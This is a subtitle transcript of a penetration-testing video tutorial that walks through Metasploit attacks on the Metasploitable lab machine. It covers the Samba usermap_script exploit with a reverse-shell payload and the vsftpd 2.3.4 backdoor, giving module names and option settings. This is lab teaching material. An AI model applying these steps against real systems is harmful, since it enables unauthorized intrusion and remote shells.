1
00:00:00,240 --> 00:00:00,880
Hello everybody

2
00:00:00,960 --> 00:00:02,180
and welcome back.

3
00:00:02,180 --> 00:00:08,790
And in this tutorial right here I will show you how you can perform two different attacks on the

4
00:00:08,800 --> 00:00:09,380
Metasploitable.

5
00:00:09,390 --> 00:00:11,030
So just follow my steps.

6
00:00:11,130 --> 00:00:17,290
If you have Metasploitable up and running, you should be able to exploit it with these two attacks.

7
00:00:17,310 --> 00:00:21,230
So the first one that we will do is an attack on Samba.

8
00:00:21,240 --> 00:00:26,980
Now I believe that it has the same vulnerability as on the OWASP virtual machine,

9
00:00:27,120 --> 00:00:33,930
but I could be wrong. So let me just first of all zoom this in, I will zoom it in twice, and what I will do

10
00:00:33,990 --> 00:00:36,720
is I will run my Metasploit framework console.

11
00:00:36,720 --> 00:00:42,080
After that we will search for some of the Samba exploits and we will see how we can exploit the Metasploitable

12
00:00:42,090 --> 00:00:43,680
virtual machine.

13
00:00:43,680 --> 00:00:46,020
So, let's wait for this to open...

14
00:00:49,250 --> 00:00:51,490
and OK. So we are good to go. Now

15
00:00:51,530 --> 00:00:53,270
right now what we want to do,

16
00:00:53,420 --> 00:00:56,280
let's say my OWASP is my Metasploitable.

17
00:00:56,300 --> 00:00:58,930
So you run a scan on it,

18
00:00:59,180 --> 00:01:05,110
it will finish in a few seconds, and you find out there are open ports. So the open ports for the Samba

19
00:01:05,150 --> 00:01:09,470
I believe is something like 445, or 139, or something like that.

20
00:01:09,530 --> 00:01:15,860
And then after you find out which version it is running, and on which port is it running, you can

21
00:01:15,860 --> 00:01:21,800
search for the exploit that will suit you. So we can see right here that it is running Samba 3.X

22
00:01:21,800 --> 00:01:26,690
Well, basically, 3.X which is basically any version from 3 to 4,

23
00:01:27,110 --> 00:01:28,730
and on the 445 port.

24
00:01:28,730 --> 00:01:30,910
Also, running the same version.

25
00:01:30,950 --> 00:01:37,370
So what we want to do is basically just click here, type here search samba, and it will list us

26
00:01:37,460 --> 00:01:42,710
all of the available exploits for this software.

27
00:01:42,710 --> 00:01:48,750
So let me just zoom this out so we can see it a little bit better, and we are not going to use

28
00:01:48,750 --> 00:01:54,320
auxiliary anymore. What we will use is the exploit. What we want to use is this one at the moment,

29
00:01:54,440 --> 00:02:03,650
so exploit/multi/samba/usermap_script. It came out in 2007, it's rated as excellent,

30
00:02:03,740 --> 00:02:07,730
and it says right here, Samba "username map script" Command Execution.

31
00:02:07,850 --> 00:02:14,090
So, for example, you could also check out some of the other ones, but let's say the upper one is only working

32
00:02:14,090 --> 00:02:19,370
for the versions from 2.2.2 to 2.2.6.

33
00:02:19,370 --> 00:02:28,370
So it wouldn't work for our own version. So let's use this one. And they repeat that you need to you to

34
00:02:28,370 --> 00:02:32,800
have the Metasploitable open for this to work.

35
00:02:32,870 --> 00:02:38,030
So now that we selected the exploit, let us show our available options right here.

36
00:02:38,180 --> 00:02:42,420
You can see that the available options are RHOSTS and RPORT.

37
00:02:42,560 --> 00:02:46,700
Now RPORT is already set as 139 which is correct in my case.

38
00:02:46,700 --> 00:02:48,250
Now it can also be 445.

39
00:02:49,160 --> 00:02:54,080
If you're running that on both ports you can actually check both of them,

40
00:02:54,590 --> 00:03:01,160
one after another. And what you want to set is set, and then RHOSTS, and then the IP address of

41
00:03:01,160 --> 00:03:06,320
your Metasploitable. So I will use the OWASP in my case, it doesn't really matter.

42
00:03:06,320 --> 00:03:11,780
After that what you want to do is actually select the payload that you will use in order to exploit

43
00:03:11,780 --> 00:03:12,860
this machine.

44
00:03:12,860 --> 00:03:17,570
Now the payload, you can check out your available payload with the show payload option that we covered in

45
00:03:17,570 --> 00:03:22,970
the previous videos. It will print out all of the payloads that you can use for this attack.

46
00:03:22,970 --> 00:03:30,050
Now the one that I found working on Metasploitable would be the cmd/unix/reverse, which is this

47
00:03:30,050 --> 00:03:35,300
one right here. So you could just copy that payload right here.

48
00:03:35,300 --> 00:03:36,020
The ranking,

49
00:03:36,020 --> 00:03:37,580
they all rank as normal,

50
00:03:37,580 --> 00:03:41,700
and this one is Unix command shell, double reverse TCP.

51
00:03:42,410 --> 00:03:50,150
So what we want to do is set payload, and then paste the payload that we're going to use.

52
00:03:50,150 --> 00:03:53,080
Once you select that you want to show options once again.

53
00:03:56,110 --> 00:03:59,990
And you will see that the only thing we need to specify in order to get to work,

54
00:04:00,010 --> 00:04:02,270
we need to specify the LHOST.

55
00:04:02,270 --> 00:04:04,540
So LHOST is our Kali Linux machine.

56
00:04:04,540 --> 00:04:09,040
So just type here your IP address, which in my case is .1.7 I believe.

57
00:04:09,040 --> 00:04:17,110
So set RHOST 192.168.1.7, and all you have to do after this is basically

58
00:04:17,170 --> 00:04:24,150
just type run. This will run on your Metasploitable and it should give you a reverse shell in return.

59
00:04:24,160 --> 00:04:28,210
Now since I'm scanning on the OWASP this will not work for me. As it says right here,

60
00:04:28,210 --> 00:04:34,660
exploit completed but no session was created, which I pretty much think it means that this virtual machine,

61
00:04:34,720 --> 00:04:37,580
which is the OWASP, isn't vulnerable to this attack.

62
00:04:38,000 --> 00:04:44,020
But this one should work on your Metasploitable. What you will get, is basically it won't prompt you for anything,

63
00:04:44,200 --> 00:04:47,670
but it will basically look like it came out.

64
00:04:47,680 --> 00:04:53,270
But once you type ls, it will list all of the files on the Metasploitable that

65
00:04:53,500 --> 00:04:56,050
are located in the directory.

66
00:04:56,050 --> 00:05:00,690
So, that is one of the attacks that you want to use against the Metasploitable.

67
00:05:00,790 --> 00:05:05,950
The other attack is on the FTP port which is Port 21.

68
00:05:05,950 --> 00:05:07,660
It is very simple to exploit.

69
00:05:07,690 --> 00:05:12,500
You just need to set RHOST and just click exploit. It is on the,

70
00:05:12,760 --> 00:05:16,840
I believe that on Metasploitable over port FTP, which is Port 21,

71
00:05:16,840 --> 00:05:19,350
it is running a version,

72
00:05:19,630 --> 00:05:20,440
pardon me,

73
00:05:20,440 --> 00:05:22,140
VSFTPD234,

74
00:05:22,280 --> 00:05:27,250
or something like that, which is basically vulnerable to this attack.

75
00:05:27,250 --> 00:05:34,210
So what we want to do, first of all, you can nmap the Metasploitable, if you want to, and see the

76
00:05:34,210 --> 00:05:43,450
RPORT 21 yourself. And after that you use exploit/unix/ftp/vsftpd_234_backdoor.

77
00:05:43,450 --> 00:05:45,930
So let me just close this so you can see better.

78
00:05:46,960 --> 00:05:50,300
Click here enter and then show your available options.

79
00:05:50,300 --> 00:05:55,540
So show options will show you that the only thing to specify is RHOSTS.

80
00:05:56,200 --> 00:06:04,000
So you specify the RHOSTS 192.168.1.2, which is basically the IP

81
00:06:04,000 --> 00:06:08,460
address of your Metasploitable, and all you need to do is click run right here. Now

82
00:06:08,470 --> 00:06:10,830
I won't be running this since I don't have Metasploitable running,

83
00:06:10,840 --> 00:06:16,180
and on OWASP this version of service doesn't exist.

84
00:06:16,180 --> 00:06:23,960
Basically, port 21 isn't even opened on OWASP. So those are two attacks that you can try on

85
00:06:23,960 --> 00:06:25,560
Metasploitable if you want to.

86
00:06:26,030 --> 00:06:27,760
You will not encounter it anywhere else.

87
00:06:27,760 --> 00:06:32,110
This is just some of the older versions that basically got patched long ago.

88
00:06:32,150 --> 00:06:38,900
So, these are not some of the real life attacks that you will encounter, but you never know. In the next

89
00:06:38,900 --> 00:06:43,340
videos we will try exporting the Windows machines.

90
00:06:43,360 --> 00:06:50,520
So that will be some of the real life attacks that you can actually perform with payloads, with the Meterpreter

91
00:06:50,570 --> 00:06:51,630
shell opened.

92
00:06:51,650 --> 00:06:56,870
So we will do that in the next tutorial, and I hope I see you there. Bye!